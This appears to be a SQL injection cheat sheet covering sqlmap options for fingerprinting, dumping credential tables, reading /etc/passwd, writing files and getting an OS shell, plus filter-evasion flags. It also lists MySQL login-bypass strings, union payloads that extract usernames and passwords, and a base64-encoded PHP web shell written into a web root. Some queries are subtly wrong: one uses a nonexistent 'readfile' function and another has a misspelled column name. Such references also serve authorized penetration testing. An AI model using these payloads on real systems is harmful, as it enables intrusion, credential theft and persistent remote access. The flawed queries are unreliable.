Skip to main content

SQLi

SQLMap

Tips

  • Copy the request as cURL in the devtools and change curl to sqlmap
  • Save burp requests to text files and load them in sqlmap with sqlmap -r request.txt

Don't ask for user input

sqlmap ... --batch

Fingerprint

sqlmap ... --current-user --banner --current-db --is-dba

Enum everything at once

sqlmap ... --all --batch -v 0

Enum schema

sqlmap ... --schema

Enum dbs

sqlmap ... --dbs

Enum tables

sqlmap ... -D dbname --tables

Enum columns

sqlmap ... -D dbname -T users --columns

Search table by string

sqlmap ... --search -T something

Search column by string

sqlmap ... --search -C something

Dump everything

sqlmap ... --dump-all

Dump table contents

sqlmap ... --dump -D dbname -T users -C email,password

Dump w/ filters

sqlmap ... --dump -D dbname -T users --where="email LIKE '%something%'" --start=1 --stop=15

Read file

sqlmap ... --file-read "/etc/passwd"

Write file

sqlmap ... --file-write "file-to-write.txt" --file-dest "/target/destination/on/victim/file-to-write.txt"

OS shell

sqlmap ... --os-shell

Send traffic through proxy

sqlmap ... --proxy http://127.0.0.1:8080

Save traffic to file

sqlmap ... -t ./out.txt

Verbosity

Show errors

sqlmap ... --parse-errors

Verbose output

# No info logs
sqlmap ... -v 0
# All payloads
sqlmap ... -v 3

Tuning

sqlmap ... --level=5 --risk=3
sqlmap ... --union-cols=6 --union-char='A'
sqlmap ... --prefix="\`)" --suffix="-- +"

Bypass protections

Randomize user agent

sqlmap ... --random-agent

CSRF token

sqlmap ... --data="...csrftoken=7c65966e-4a4a-408a-bd92-fe2a3a9ee094" --csrf-token="csrftoken"

Randomize value

sqlmap ... --randomize=some-field

Tamper scripts

sqlmap --list-tampers
sqlmap ... --tamper=space2comment,between

Mysql

Fingerprint

select @@version
select sleep(3)

Enum dbs

select schema_name from information_schema.schemata

Enum tables

select table_name,table_schame from information_schema.tables where table_schema='zzz'

Enum columns

select column_name,table_name from information_schema.columns where table_name='zzz' and table_schema='zzz'

Enum current user

select user();

Enum current user privileges

select grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'<user>'@'<host>'"

Enum current user write file

Check if value is empty for access, whereas NULL means no access.

select variable_name,variable_value from information_schema.global_variables where variable_name='secure_file_priv'

Read file

select readfile('/etc/passwd')

Write file

select from_base64("PD9waHAgc3lzdGVtKCRfUkVRVUVTVFswXSk7ID8+") into outfile '/var/www/html/pwn.php'

Login bypass

' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+

Some union injection examples

' union select 1,username,password,4,5,6 from db1.users;-- -
' union select 1,user(),3,4,5,6;-- -
' union select 1,sleep(3),3,4,5,6;-- -
' union select 1,readfile("/etc/passwd"),3,4,5,6;-- -